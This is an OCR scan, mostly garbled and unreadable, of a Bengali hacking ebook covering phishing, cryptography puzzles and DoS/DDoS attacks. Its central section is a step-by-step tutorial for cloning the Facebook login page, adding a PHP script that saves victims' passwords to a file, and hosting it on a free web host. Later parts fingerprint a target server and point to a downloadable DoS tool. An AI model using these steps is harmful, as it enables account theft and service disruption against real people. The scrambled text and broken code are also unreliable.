SIPKafam mm , 

% 

t 

Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.

| , 3m&r fmrnimcTOiy Icmjfmm ctotctof Prfem am ?ja to mm IS^nm cmm , arroTO^ , c#cs£ m# am mm am Irofm (rnmlfm aicm mfatm

| cm^mr cm fmpr° mcm i




| mro mrnia cmm , mjm am cwfcmr ISsnm .am H^nm cmm , armsm^ ItoPt mfatm cm3?iTm smy cmmpfm ^arcm aiFfm mfm cto^f am 

*ia$ ormca 3<F>bf malm cto - myrnmrm mfm amm aic^ PoPf° mcm " PoPf° mrmFmma aam^r ^cmlm 3im mrmtm msrcmr mm mrcm - i cmmcrn \3?" PiR^ ^cmlm 

t , 

s\ ^ SSuYifi m mn mr m^Pit <3 mrm w m^Pm ^ma jm^ cmmcm m^m fmm v3 ^mr mrcm 1 mmp mr^my 3t fmm aim tmm mr ! sfy 
| aim Srm ma c^ma <3^ mmm <3m&T m^itm cto cm&rm mrmcm mimim arm tamfSm 31m mm am ^fm mmm trnma tefm mmm 1 


| *flmm 5y f jym- ^ ? 

I 

1 

| 3a aiK'iiIba 3mE?T fmpF f%^ Sa>a)0: TOmm aircm 3m <mrm aFfw ^ fmm m ! mmTm\3 ar ainm mr^ i d mum amr fmpr° 3m aifw mm 

| TOcm\3 arnmat 3m amm to% 3 (mrm mwcmai \3 tefm mF fm ! ^rmcm& 3m crnm^ mfem ^rmr mrm , vt> mrcrnm ^ ^n^Fifm amm 

^jPiftm m^cmm mcm am ^cmrm S^fba mF I alt.online-service.america-online mrcmm am&r tm^rsFm amm am aiflw to 2 # 

| W mrnitc^ 1 aTtmm aay a^mSt mr#^ am ma #Pr^ am v3 S^af% ancmtmmT (a 1 America Online m AOL service a amm f%pR am 


| 3^T?T oTTpT 3?T Rife <MTWfl ! vs^WW TO (W $«&l'fl'0HB v3 ^Tf fe ( PHREAK) Wfe Wvs !

Phreaking 7s rcw ^srrferfe ^ tBfeRSRc4*H 3 ?t Rife fw tfe ww , 3 totttrt ! 3Bt 3^Bt mr° ! c*fe \ 

• W (3> Rw *1Hlft\3 W , <MfM \3TWT CbPl^RSPiC^^ 3^ R|R)S| RW fWR 4TT^ \3Wf ©Bfe Wit ft[W olf^WSITvBS'l \!>Mt (3>vB | 

| RPr ft^ w *wtt wr w i 3^ (?qi^ RRr *pr afen Bit oicw Br w* w ^liw ^ Bit Rw w “PH” 3^ w* *raw 
I “ISHING” &w a^ncsr csti^t fw Phishing) *Ri?i?r 5^# 5?r 3 


| , w^ , wr tvsiiPi oRkvs wfe 3^ RR)?i (B^fw v3 RN> (^ 

| 3 M I 


(WtB 


, CST ^)|(<K <1°11 Wl R 5 ^ 3 C^C^t R>Pl° ^|R>\ SF3 


I /^/t? SiW fl>M s f& e T ? tyWM \sT ? 

I 

sL 

fe, PpPk 3^ ftf%W ^(W ^®T oTK^ I ^ 13^1 Onl^ (®lt f% f% ! 

| 

• Phishing : whR RRr wt 3 t ^yiBfe <wi i 3^3 cw RifeBiRB / w ^iw ^r i RpRr w 3 t ^nB^R 3 <y w 1 

• Spear Phishing : 3^fB RRB §ft BtrB w RRk wi Spear Phishings 1 

• Clone Phishing : 3Br w , ^K^it c^ GbfeR <pra?iT 3 ^Bt Rfe ^fer 3 ^ cm / cwys 3^t 3 ^Bt tfe crm w 3 otkw ^3 

( R-*W<i , V^RT ^sTTR ) ^ 3BTSv 5" Rf¥ Br WlfT 3^ WT Rrft^ f^ 3^ ^ ^5T C^v3?n 3JW 1 


From: Facebook <updatei-nwiqhnbz@facebookmail.com>
Subject: Facebook Account Update
Date: October 28, 2009 4:02:51 PM PDT
To: Tom O'Leary (Messaging Times)


facebook


Dear Facebook user,

In an effort to make your online experience safer and more enjoyable,
Facebook will be implementing a new login system that will affect all
Facebook users. These changes will offer new features and increased
account security.

Before you are able to use the new login system, you will be required
to update your account.

Click here to update your account online now.

If you have any questions, reference our New User Guide.

Thanks,

The Facebook Team


This message was intended for tom@messagingtimes.com.

Facebook's offices are located at 1601 S. California Ave., Palo Alto, CA 94304.


Update your Facebook account


Whaling : cm 3 ^Bt ^rrRr 3 ^ w ^ t^p^B wr?r ^RbiRvs w srrf^ 3 $ ^ 1 

Link manipulation : pm ^RR^m fitw 3 ^ <pma fw ww ^mih?i c^c^fi s^\ « ^ Bw Link 

manipulation^ 1 m www.facebook.com 3 ^ Link manipulation ^ w www.faceb00k.com [ 3^bt "o" 3 ^ 3^bt 
"0" (zero) <s<w w fe tB ! 


^yrf%° Rc^ct 5 ^ w \ w 
[Screenshot: a page titled "Facebook Login" that imitates the Facebook login form, annotated "Not Facebook"]


Filter evasion : ^rf^r csn^sw ar torto RRk tot?t tot to & IVSia i Jt troTO gf jtstuto tot <Sw& gf jfser 

to^to tout RRr to to Sw Filter evasion to i 

Pop -up : j<fS r stRS f%RS tom i jto to to ^#r j^St to oift jut tototo toR^t tovs sprt cto toto vtot crow 

tovs to RRsva to to jSt Pop-up phishing I 

Tabnabbing : jR *ttow RRrx j wr toR j^tR^ tro sto tom vsto %to ctoihi j^St Sto toS Rrttou^ RRrx ^nRs j 
to ! 

Evil twins : j tovs totc to cto toto RRr jSt ! Rf%w toR^ cto ^ (wrur toi^R to , toto ar ta j^St v 3 ?tiR^tR cro feR to 

I TO«T R \3R v3?n^Plt (5TFT 4>(£l TO TO^T TO vsTO (^CpR SYRTO TO TOtTO ^TT §R TOT <K?I I 

Phone Phishing : jStu wgy jTO RRr tot i toto RurR^t to w toStRR& tottR^ toSto ctoto toutto tot ornate 

ftUTO R)<p>fb^l R> TO ^TO TO° vsTO (?H^ oFsW FTv^ 1 # ^TTUT vsW TO vgsjy (^ | 

SKT foviw C¥ Gnft Git ^ R)R>)b TO/I~ 197 C577W ^77/TO J7^T ^77#^ ? 


TO^TO TOI 9 ^ H^T ^ , fepR TOT UTTO 3^ TOT ^ vsW C^fTO^TO^ ^TfWfftTOR 5 #f&f% 

RtPstoto^ Transport Layer Security (TLS), Secure Sockets Layer (SSL) sm ^ ^Tf^rrft f^^srr^t <m\a ^ 1 

Sc^KTO S"TO R\3fl <^(.fl J^bl ^Rb C^" ^ifCRc^b Cn\3?JT I ^(.vbb <Pfll S\^\ TO^T 2 jfTO' to aiS'b'iifi J OTCTOUTT ^TWCTO PpPt° >lRb (^ TOT^ 
TOtvs S TTO J^“ ¥?T“&?T oTO TO \3 W I tTO vTOTO \3 oTT^Tf^T Rr^T\ 3 TOT^nsT TOTOK TOUs 5 TKTO I vTO TOT Rcbfl fe T gT&T « ; W 

^®r S 






friRi <c$l ^TS ^T C^^IM ai^sr ^sT^TOilFT^TfTOT >i!^b | C^TTOK^TT3T& CTOTO >iHTO"!!! 


https://www.facebook.com

•i'VM! c^l?Jlei ^T^iT^Wt?T HTTPS T^»Jl | HTTP 51?> T "$I«prarw ;) 


^^TTTO ^f% 'iCB'rCvs UT^TTOT WT#T C^W TO^T oTTTOITO sU'S'^'I'fl TO TOTCTO I TOTO?T J^" TOT Rl¥ &T W TO=T I W TOTO^T 


^Tvs Rr? St f% ^jtto Ri¥ =rrf% ut^jus cror Ri¥ 1 fro Rr? ^to^tot ^Jj^tto ^jtRt to^ tottoto orr 5 TU5tSv5' ^ifiMb Rr^yRrf? to^tw 

TOV3 1 


^yrf%° Rt^t Rt^to tot^ tot ^tuto tot^ tot to 
S03E iSHM SSL dMW Jw jy«b ?


voJlR \^CV3? ^(*1 (®Tt 3I?T CTOW 'Si«li ^" c f®TT <Pfll 

I wPr c^itoiw? wSt toto w i 


I 31^ C^Mf|5 ^°TOW TO sib(vf)>llTOT TOTOW ^flC'l TOW WT [bS«1|fl CTO TO 


I 3TO^ TOC^T TOl^T TOfTO WWpT 3<Pb| PpPr dl?b 1MIW S 1 I Shl^flC^W vOJHfll (TOTTO 3^ 3<1>b| RpPr dl?b TOTOW ^ 

I ^ ^ ^ ^ ^ ^ 

1 TO*T ! 3^*1? WTTOIW hfWfl 3<1>b| &|R?° \3 3<1>b| CTOPT§«T I Sffl vdMi v^Hfll fe (A|pb° 3 CflR>H°3?*IM <Pfl<l I <3 

| TOa OOOwebhost TOTOTfi tow& c5Tpfc 3<r sprt i OOOwebhost 3 cafectror tocto tiro TOp 3 ^ fro? i froTO fwro to wfectror 

| CTO vOJHC'l TO \5T&T fTO CflftfiC^IM I 3TO ?OI?<1 CofflPpC^TO TO[JT I 






[Screenshot: 000webhost.com "Order Free Web Hosting" sign-up form]

*?r to*t: 3to?t www.facebook.com 3 tot 3to to^t cto 3 wp^t 1 3$r f^roro to?i*t w to tot 3to 3Sr cro^ 3 ^ TOt*r cto 
1 3to^ 3^ cto 3 ^ ctotott fii^b (S 5 ^ <k?i View page source 3 tiro to^jt 1 


[Screenshot: the Facebook home page with the browser right-click menu open]


TOifro fr^r Pkvjw tott tow www tow ^to to 
vs>r 3T*t : View page source si fww rrrr fRi&R fteR rvs i^tr ws i jrtr 3t Sir jr rr Ctrl + A fRiR%

3R° 3Rt?T (RT& RHvS - <3 C^R? I 3RTR CRv3 R^R Login.htlll RTCR I 


8 s / RPTI 3RTR Pl(.b?l (R\3RT (RW fi? RTIRRt? «lv£«l CRT&' p HTv5' \31RR RIR RfR (R 5 !? R^R 3R° 3lfftR phish.php RTCR (Ro R^R I


<?php 

header ('Location: http://facebook.com '); 

= fopen("passwords.txt", "a"); 

foreach(Array as => ) { 

fwrite(, ) ; 

"=") ; 

); 


fwrite(, 
fwrite(, 
fwrite(, 
} 

fwrite(, 
fclose() 
exit; 

?> 


'rn" ) , 


'rn" ) , 


CT RTR I JRTR login.htm (R \ 31 RR R^R (RT^RiW RiC^I RRRf RTtt? RIR Si fib Si I < 3 RR Ctrl + F (RR 

action=”https://www.facebook.com/login.php fpp i at &r <s login.php srpmj phish.php ca« 

R^R I 


bis rpt : 3rtr http://members.OOOwebhost.com/ 3t tRW rtr si^k siw^ rkr rtrtcrt rtrrr St s\ rr ^r 


Rlf%° f*T^R few RRT RRTR oRTR ^sllsl ^iRT RR 
[Screenshot: hosting account login form with email, password and captcha fields]


w qnr : ws ew Cpanel 3 rm , File manager 3 ^ 


[Screenshot: hosting control panel icons: View FTP Details, File Manager, Disk Space Usage, Backups]


I *n*T : 3^ Public_html 3 fww 3?r ^rar otr gtft 3 3^x phish.php 3 Login.htm ^ i wt 

| m I W (2T oTRW f%Pl\9 R oTI^W teft fapR CW <3 BFT W * 


[Screenshot: file manager directory listing of the account root, showing the public_html directory]

*73*7# 33 , 377 ^ ((97 IS35/SW v3 W /3>o/W 


? X 


http://www.yoursitesadress.p4o.net/lol.html [ w 3 ^or 5 t£ 

1 PPp - ] <3?R$ <3 : TR 3^° <TR2^r <hflTO (T^IRT 5 TT31R 5 T PlCbfl IbCafl ^vd tjRT ^ 


yoursitesadress 3?r ^rpr^f (vs ^strrr teft cstct^t 3?t Rw 


charset_test = a,-i, A ,a f - 
version=l .0 
return_session =0 
session_key_only =0 
t r y rn.mi= 1 
lsd=Cgt 3 b 
ernai 1 =. 
pass- 


Tnf%° f*r^jr Pk^u^ ^ w \ wr otrr i<^ 
^Wfl ^VD f^T ftf*R f^RI^T fwif^vs oJK'llb^il I


^yif%° f*r^jr ^w\ ^fiifi <p$\$ ^ 
<)J||Sm> snfo ^ vb
IHStBiRw 


Cryptography fc? a&r >£ 1 oim wf w? 


Hacking m sSr Rwh [ w w :/ ] mm cm basic \m *rr Sw ^ifm calculus wr 3 <pjt\3 mm 

mm «n mm hacking 3 3 m^rf^r ftm f%\ w mm *rr ^ ^rrmw iiiw basic hacking grammar mr w ! 
oiTPr ^ fSS^r Sr (\3 <£tr w ^rfw hacking grammar orrmm m^r CTm mil 



miiwiimmij 

I ■??[« -alHIfl (SftW «TM 

&T HlfH 'SW srrfSr a? \J> Bt 


snw snR CRYPTOGRAPHY, ENCRYPTION a DECRYPTION fer _ 

<SilC*i*1 v9(.<] -Mis!| ailUI'l ^Tf VSICUI W <lR STffsr Wlblijfb pipe's oIiHR -qp Rft <Kfl ,3^\ K-HI^T 3? IbS^ R 

RW?I PJTSHf? SfflMfl J<P'Si li 1 Pl*H\93 5t?T -NK<W M 

Cryptography : wikipedia aia 

Cryptography (or cryptology; from Greek κρυπτός, “hidden, secret”; and γράφειν, graphein, “writing”, or -λογία, -logia,
“study”, respectively) is the practice and study of techniques for secure communication in the presence of third parties
(called adversaries).

sNft jfw’f war cam <n «j4iwra a^1% cryptography ^rr 5?r i akr srmr akr IRm Rem i a wm graduation certificate 3 
cayrT 5?r i 

Cipher: <?r algorithm mm m ^tSt ^rfm ^tSt mr cipher m i 

Encryption: cm algorithm mm m ^Sr tstSt cf m1% cf encryption m I ttcm m m Caeser Cipher . jSt 

cipher, Shift Cipher ROT-13 Rotational Cipher m ^amr i m english alphabet 

oim^pf Rhvi'h m mm tstSt c^ encrypt mr i 




[Figure: Caesar cipher (Julius Caesar), the letters M N O P Q shifted to P Q R S T]

i at (\5 crovs wtot wro w alphabet yir of ^ to 3^wr tow i wfft M (^ P , N (^ Q ^ tot tow i 3$ TOife 

vojo^Hfi^r tot ^frow trow to encrypted w Sr c tow toto ? encryption to Sovn i 


: Decryption: encrypted to of w Cvs encrypt tot tow to totto Sw^t tot oWHfK tot w&f w plain text of $tro tow 
| 3^f% of Decryption to i decrypt tow wnt correct key ( encrypt tow to 3 ) tow i correct key to w£t Sw 

tow wro of statistician wto tow 3<f fSfro tot -3tow ! w&r cwt^fS totfftR :/ 

I 

35JWT f%cT spf ^TT I WW3 ff 1 ^ 3(TO'i°5N v5TT?T \3 (TOT 0# -=■ 

I 

I 

S Cryptographic Hash Functions: f4p£Tsnl44 srrr ww . 34 ft fmfi?i4 *r^1% m?r tow 34 ft tstBt/ plain text TO4 ?i 4 / 

t 

arbitrary block of data -ftr ijmslms 54 i to ^rr^r^s to 1w encryption m fw encryption 4?n?r *ra1% i 


Input Hash sum 



| Hexadecimal: hexadecimal to* 34 fr Cryptographic Hash Functions I ppto w w 5i 4 vr«$'ra <mmn?r 4 m 54 mkr 

I 

\ encrypt/decrypt 44m tot i s>t> frt 4nt4?T4 tot 0-9 a A-F I Jkr 34i?r 128 bit / 16byte 34 hash value . Jt4 Base-16 a to 

p 

TO TOF i to orw TOfro hexadecimal hash value to MD5 I 

: 

1 

| Base 32 :: Base 32 to \ 2 >} tow^w jst hash value I to A-Z 3 2-7 tow^w ^tt tofw tot f?t i sm; r SwfW to 
d41d8cd98f00b204e9800998ecf8427e 

; 

; 

I 

| Base 64 : Base 64 orTOv3 3f£r Hash value I to A-Z , 0-9 a^\ ff^ f^m fw toto tot s?ti Base 64 wtto “=” wr ew f?t , 
| Swr os 1 B2M2Y8AsgTpgAmY7PhCfg== 

I 

4 

i 

| Collisions : ^ Sr wwrw wwrt hash value to 3 ff tow encryption to \s*w vw server a frorfro ^ft w i 3 $ ferf% of 

collisions toit ^ 1 wito hacker cro sprt wfltfw i vswr 3 &tcof \ 5 www “God mode birthday attack ” to 2 nw i collisions to 
| server hang (To crash 3 tot^ w i ^tto^t os 

1 to ABDUL encryption to: os 9b306ab04ef5e25f9fb89c998a6aedab 

tow TOpr FREAK TOft^ encryption to os 9b306ab04ef5e25f9fb89c998a6aedab 


| vTOf to wr to CoTO®r encryption 3 ^ tow i s \ITO collisions to ^?ti wtoto to^ to to server s \ at toto ww 

| OoWf W?T I 

1 

I 

SALT: Salt to hacker cw wit i froro AI upgraded server SALT ct^mt to i (TOW wU to ^fw tow Sito 

i 

| encrypted 3^ cro to tow^w (To to otto of SALT/ SALTING to i SALTING tot w cto w£t Decrypt 
| tot 3orowt toto O^'oto ^ “Isf5651etg64sfg” to 3TO encrypted data.3^ 3^ c*w a ^#r to ^ Sr tow%w tot ud7 to 
to o^ \3TTO v3&[ decrypt tow to ^frow tow to w i tot Super Computer 3 3ww w ! 

i 

: 

u 

| w&f decrypt toovs to to toto i ^ ft encrypted wSr crow » to w decrypt tot 3tow 3 wn ft towws w 
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I 3AcTBJCzggwY3LCyzIhJBJhtzewSA+5dyuQhaKcDzI3agWCRz+YC30ZMCdyG 
! FERON-74 -> GILA 7 


aw^ aw BASE-64 


f f 

spfft f5 ^ wf cro \st aro BASE-64 a encrypt tot toiw i tow to BASE-64 oro am encrypted TO FERON-74 | 
| a totw encrypt tot stto i caiTO to GILA 7 a encrypt tot stto aw^ TOw encrypted TOr torw aw TOf tti aw a!TO | 
1 decrypt totvs to torw cf encryption aw wm tot Rff vstcw wto wto to i aw TOf cf aro GILA 7 a decrypt 1 

1 S 

totvs to i tot to to to tt wrfw i TOf encrypt/decrypt totw spry amwr to to TOr http://www.crypo.com/ 

| WW5TW TO WrfS a# (^oT[3JW TO ^ TO I 

I | 

| s) srr^ST&r sNft 3AcTBJCzggwY3LCyzIhJBJhtzewSA+5dyuQhaKcDzI3agWCRz+YC30ZMCdyG awr strwt GILA 1st | 

I decrypt a^ww i decrypt <ratw pr tstSt a# «t uRC0CTM6qvsPRnD0NKSFBT13Azy8RZRgNLsbPlMvPc74 

1 1 

I 

I *) jwtw jStw FERON-74 a decrypts ait YWlpJTIwZWtqb241MjBiYW5nbGFkZWhp I 

i i 

i i 

p p 

«) aWrwwra i ara decrypted ^iSr asia BASE-64 a decrypt <ratwt ;wiwt srm tbt&t St catw wiwi anww aSit aw aaa/ terminal 

| hash value. <fwt wr wiR>pt ; aT s p decrypt <Ftw caPr sim ^iSr Sr Q3 | 


decrypt <fwtw aw strwi ait ami ekjon bangladehi! 



a^jwt faw cryptography aw ^aw 

f 

I /encryption sequence <s fata faw i 


awwitw awanfw basic wiwwt ^twi i a*iw srrfa fats } Sr encrypted faw i correct key 
srrawiwi cstfr a>tw ca^w isn \5 TBt sjftt decrypt a^wps arcsw f%wr ? aiwtw comment a v5<rw fw^w i 


[encrypteddatal] s+/YrnabNF/0q699ALypuvMf6RsnebxWuTlVBYwjAuDprL8veX9DQcs+qZ7jr6/b 

1 I 

I I 

I Correct key : MEGAN-35 -> GILA7 ->FERON-74 I 

[encrypted data 2 ] 

1 k2nPkvWydlnxRMO/jZj 1 nMmqmvOPlMmxn+fxnxjhlKjGm29dn 1S1 lvXUelWyjuKXo2C7exiyo/i7oLjRj20AjLiwofOz I 
| lxlYk2nPktGdklj6ju07RKS6fuK8ode5 f 

I ! 

| Correct Key : BASE-64 -> TRIPO - 5 -> HAZZ-15 -> MEGAN35 | 

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«diPi 4 ■ s: DoS ? DoS sitiSff c^r R>©k<i ? 

<ulH4 5T(1%^ a?r <w ^ a<R a ^ srprm sitptmt 4?i<r DoS , DDoS attack asjprr Ptt?r <jfi«tsisi RaiRivs ®r i 



3*pt 3?r DoS fSiPpr Sr f¥ ? DDoSa4? DoS f4 a^t 


mmmmmm 

r - ,Y 
IflMb [ ^Ibl^lfl J 


HUM i 

3^t?T RiRfe Ws 

3C?T ^TT?T 


DoS ^ Denial of Service I DoS sl 3^St prf*r toi s \^t 

[ fe4f5^ ] 3 oj«H<i^\3 [ jnfex ] TCP / UDP <P ntor ^ i sos ^ 3? 3<t am oHVMi h<iR>\ 

i ? 3?r ^ ^ 3 cstr ^rf^r (to?tt c 2 ^ fes (Mq& Denial of 

Service cw ! 

3^w DDoS I 3 Sr qjr Distributed Denial of Service I ^ttto St 3oir fw ... orrf% ?tm R?r <St& ^tc^t w 
^TTRI^ 3^W twlt^rSt oTIZFSR <i>fK*i| ! 3^ olPfRr Rf^T RTCR vaR C 2 ^ 3^|> ' 1(^*1 l?l ^ S TOR 3^° \5TO ^TTRr* Si 3X?T SJTWT 

^rr^rPr S^cSi \3?" Rm\3R<pi§I Pilbc^ \Ikft <nPu.^ Rt^ 5 tk^®t i R^ ^R s ^ttfrt os so - s^ ^t[3r®t <ksi ? sg Pm 

(?TR> ^Tv5T S T]R=T 3^R ^THW ? DDoS I DoS 3^ Ws <KsR <Kfl R 5 ^ 3 DDoS <3 v^ilbl^lfl 3<MfC s T 

I WT ! 



oTRR ^ 2 JKTv 3T f% 3^ «TT 5 K B ^ ? :S 3\3$R ^ WR \sT f% ? vsRR RKSW fe^RT C^T <j!3T 3TfW RmRR DoS 

3^° DDoS R^v 3|(.^ ^Ri' ^(.fl I 
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Zumbies 


Attache 



Pitbfi Ibcafi ^vd 


FI 


FI 


fw DoS oTTH^ 6 t ^ ^3 


[Figure: DDoS attack architecture: attacker, handlers, compromised hosts, Internet, targeted server(s)]


DDoS wfcw sre fesT fesr ^ 



































www.BanglaEbookDownload.com 


DOS/ DDoS attack tw ^ia«i f^> ? 

I 

| ^ St tow DoS/DDoS wntw to anw i s) svrro to ^«»iw towt *) sysadmin to sk a i wpp oro wt w fa tow 

| WVltW TO «TIW 

I 

I 


f 

I s) WW ^RvdRR 


^rttr v3t ateiR a fRT^iR ^Sfa^ w RiRT 3 $ rt^tr cr crtrt rirtrr' ter 

RR CRR ^fv^T wRr CRH , RTR oTRRT CRTR (RTR fRRT RRRTR ! 

rrs RyiaaR v3^ ateiR a aaaf QteiTR ^rt?r rcskr faaF ir a<t>fb\£> <r><^cv3 aR&r ff-n?i£ rtrtr rtr rirt a^ rhStr 
;rrrt T 1 ^ i] ^ T fR 7 ^ ^Rh^hi m Riar ! 

spirt Pivsi^ ayiRfrte aR ter 1 


| *) sysadmin aR oft wr ^ 


rv|r crtr airs' rttrtti& spirt rrt w \ vrr Rfvsfhvsi after rrtr ^wr 
rt^tr a^ farte aR ^mrfflffte rt ^rrt cr after rrtr 
fapte aR RiRRir^iR otsttr aR rfte rtrr 

DoS/ DDoS favsiw ai^iR aR s* Sr aror ? 


: 

| _ _ 

DoS / DDoS rtrtrr^ * ottr aterR aR rtr rttr i s) ateiR cr rrtr Rfara *) atera cr Rfara 1 tsr oryf&TR aR rrr ateaRrft 

1 

I spTT - 


faf%R rrr ffrate ^trt otr rtt^r^r , araaR &ter, frsar raa- ^yrfa rw rpit i 

RRteaRRRR ^RWfRR (RRR Rfl?° ^RWfRR sjjaTTR RTfRvI RTR fRR RRT I 
C^bb ‘SJRTflR RIR\3 RTR fRR RRT I 

RpR'iRia (R&\3Rte aR fff%R ST°R ^JTRTTR aiPvs RTR fRR RRT I 

arRTRa t^aiTR aa^ atera aR gs\rr (Rtrtcrtr fatea rrt 3 (rirkrtr rtrr rrtvR arar casar 

CRfRR aR amoitRlvb ^IRW aRR caRKar 

acaaR aR aR rrvrkr rtrrtr rir rv^r crtr RaRr rrt crir fRRvs rkr 


DoS/ DDoSaR (STTR RtSTR ®aTR fR ? 

i 

1 

I \ 

| RTSTR ^Ry a'RCR RJTRRTCR ^M(.v3 RIR RITafR RTTaR^ fRRT , oTTR vsT CRTRTTR 3iRy CRRTR R^R s) RilCRb RR f%RT ^TRRT ^rfefRR^ RTaTR RToTR (R& 
I fro / WTTW 5t^- Ito , }) -a)R>1fl'-3> W«W (m^ ! W WoW WRaf <j>'IWW ^WTW (S^ TOW SWT CMD (?IW IWTSW 

I TORT ft ftp 


netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

I P 

| _ ^ | 

I Rfa CaiRR CRTR aRR?T fRf^t RTRRT RRRT RRfR oTTUr (R^R Soo + RRCRR^RR RIRCR vsIR ^TRT fRIRR CR RRR RTRfR aRTR oTffR f%vE>TlR RTfaRTR RToTR | 

| crcr aRbi orr^Pr cr rttr r^rcrr. 1 


Rfa orraRTR atenR APF firewall ^rSr rrt rkr vsir CM D cjs ff^R 


apf -d xx.xx.xx.xx


Rfa CSF firewall ^tSr rrt rttr vstr f%^R 


csf -d xx.xx.xx.xx


oTfR Rfa RTSTR aR^Tv3 RT RITR , aR^ oirafR Rfa ^ iptables RTRR vsTR fR^R 








































































































I 

iptables -I INPUT 1 -s xx.xx.xx.xx -j DROP


| 3TOIR XX.XX.XX.XX 3R RTR OR RftfR frf RTTR TORTF TOR TO RRR ^ TOR RTR RTTO TOR TORfR fRRi WP6 RToTR <3 RR RTTOvs RTRRR 

| RT 3R° 3R 3^\3 TOfR 3R RRR \3 RTRTOi)' RTRORR RT I 3R TORT TOTRRTTO 5 TOTRRTR (TORfSx 3R TjRR PiOfl <Pfl(v3 TOR I 3RR R|(Rl TOR (RTO 5 (TORfSx fRTvs 
I $(<l RTRT RTORR (\bfTOTObvb vbR o^|b|<p RTRT& (TOR I 


3 RTF! TOTTRT RTOJTRT fRRR TOTR (RRTRTR TjRR CR?TT^T RTTOR^ RTRTRR TOT / fTOSR (RTO 5 RTTOvd TORTRR ^ R^(.TO? I TOTRR (TOR (R^ (TOJR (TOR 


1 J 77 © 7 ^ ^ 37 /W SJW ^RW /r/%TO ^R RR 7 R 3 / 7 TR 


p TORR 5 W (RRT RTR TOTTOR RT (R RToTR (TO TOitTO 5 TORTF FTR CH&(TO$ TO TO 5 ! (Rlts 3TO^T RTRT ^T (JlTOTR fTOR RRFT# TOTR RTCR I TOTfTOR , TO' 

I TOT&TCTOR TOR RToTR fRTTO\3 fa(TOfl fR?[TTO TOTTO TORT TO(R ! TORRTTTO ftPbvs TORTF TOR RToTR fRTTO (TO TO fRTO (TO 5 ^JR^as RTCTO I 3R TOT 

% 

1 TORT (TOT (TOTO*\3 (TO 5 (TOT v5TT?T 3?FRTOTR TORTRR RT , TOf^vs RTlt? RRFjfR TORTRR RT , RfRpFa (TO 5 HT^ (TOT RTtR RRTRfR \3(TO TORTRR RT 
I I ot ®w r^nrftr si7crr ^7^ <mn ay<i fd ^rr iwrr^r fcr mni 2 jT ^^TORT^R (Rffr (RTRT (R[R RIRRT RTFTORR RT I TOTRR (TOR (TOT RfoR (Rlt? ORTRT 


. (TOT (TOT (Rlt? ^RT \3(TO RTRT TO^fR TO (TOT fRR , TOTRT 

0 

I rtrt SfF3 to tot tRR r&toto^ 3R Microsoft Knowledge Base (KB) toKrr 150543 tof tot fRR i 3fcr (totof froro to<^r 3tot I 

i 


p ^W>3.W ?W 3^7 


I Firewall 


| Zone Alarm 


I Comodo 


I fwfrr jw ftfjfM? iw ^mr far 

I 

I 

| S$cto^ TOTTRft^ fro^R rrto tor to?r [ System File Checking ( SFC) ] 3rx ^rr5 tortor TO?TR3?nR [ Internet 
Connection Firewall (IFC ) ] 3rtotrr tor fRR i 3 ^rt fro 5 fro^ tor feromRR tot rkto ! 3^jrt toirtr rt^r fro^R 3R fro^rfR^ 

TOR Rf^JR RTfTOR fRR I 



1 TO/W/^/? TO/^T /W 

I 

| 

| TORRfR RToR 3R RTR (RTRfRTR RT TOTRTORR TORR TORR ^TRT ^R f^t f%\ (RT& fRR% TOR fRR TOR TOR RToTR 3R^ TOIRTOf?' fRPSR 

Srtrr 6 ! r^t HTTP, SMTP, FTP, IMAP, 3R^ POP (to£ ^rt fRR% to^r torrr rt#r 3r rkr 

35JXRT RCRTO RflRhvs 3 Rn fRpSvs © 


| TOTRR^iRR RTTTOR TO RRR TOR I 

; TOTRTORR 3R FiRT fRRRTfRvs (TOT& RRT I 


| 5?(^T^ 3R TOT?TRv 3?TR TORt TOR fW TO^TR TOR RT ! 3R 3RT TORfR oTRT TOTiTOR v3TOR 3 RRTOR TOR (FTOvs TORR I 3R TOR tRRT^RF 
| TO'SlRr$Rvb RR RTOR TOTRTORR 3R ^TOR RR RRRit TORfR (TOR RTRR TORRR 3R^ RTRRR fRR^T v3 RToR ^JpTO v3 (RTF TOR R(RTO ^R I TOF^R 
I TOR TOT?nRv3?TR 3R fSTOIRI TOfR 3TOR fRR (TOR fRR 


Symantec 


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jrttst DoS / DDoS attack r*|trr jr rtrtrt 0 R 3 ?tt rtr i cw RioRev I 

' 5 JTRR oT\*T DoS voJilblR < 1*51 <1 ? 

^c <s H<t 5 oiw DoS rrt rt?t i v3c<i ^r / r\°>r era - >i^ Rwfe j^hir crrtr i facbfi rtr ^crt ; ^jrrr <^<^\ 

V3T5RT^R (R Wf v5R RTT&R 7 ^RTvs © 



3RIR^ C^v3 RTR oJHfll (R RHft? tftvD v5R RTT&W vdTR RToTR v5R Rlt&IR^R RKR RTR RTRCR fRRT JR° JR RftPf Rvs ! JI?T ORRTR 3iRT SWT 

http://uptime.netcraft.com ftrw rtr jr^ cr rt^ St rt^rr rrtvs ftr \st fRiFR crrtirt tfeR R\s rtr fRf^ftt r^t j ftr*jR 1 


[Screenshot: Netcraft "What's that site running?" web server query form at http://uptime.netcraft.com]



JRTR Rlk (R3T1R? fRCFR fb s\ Gs (RRKRI ^ ST oT\*T R^T R^R I 3RR f5 ^TRTCRR (R RR[R \3^ fRpfe RTtt? ft? oTTf&TR^ J RCR RlfR RfR 

}R ft ^<1^ oT^fR ^VI(&R tT JRtT RRRT3 fROR RT*[R 


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Whats that site running?* 


[Screenshot: Netcraft site report, "OS, Web Server and Hosting History": OS Linux, server Apache/1.3.27 (Unix), last changed 31-Mar-2012, netblock owner Register.com, Inc; no uptime data available yet]



p w Apache/1.3.27 (Unix) mr It 
I s\ v5^r omtFF ww to?tt wr i 


i sfe r 3^ Prftt s& i s\* m ^ ^ tnr cwr^n swSi <?t 3 $ 


• Apache 1.x 

• Apache 2.x 

• GoAhead Webserver 

Si^ffi : TRT * 



I 


p DoS/DDoS sintFF sprt oiw 
| omtFF 5*r Mediafire s\ ottott^ 

cwratt t*r ftpr i 

p 

m3?rrt ^ www.tunerpage.com 


bi^c'i stT^rPr CMD (r^3 Itcsr ^thfi to ^ibivsifi 

<KflR I 5 ^ ^T v 5 TS* 1 (. c 1 lvb <b? 1 (A 3 f?N> ^55 3 $ I stPRIW 

votlPt vS^T 5 ^ « 9 ^tl \ 2 >RfH>l ^TTR <KflR Olblfl 3 C^fFt Rt^ RfR ^ f^T 5 T ■w'S'l tf l^flOS 


File Info

Report date: 2012-03-31 16:15:00 (GMT 1)
File name: pie-rate-production-for-tunerp
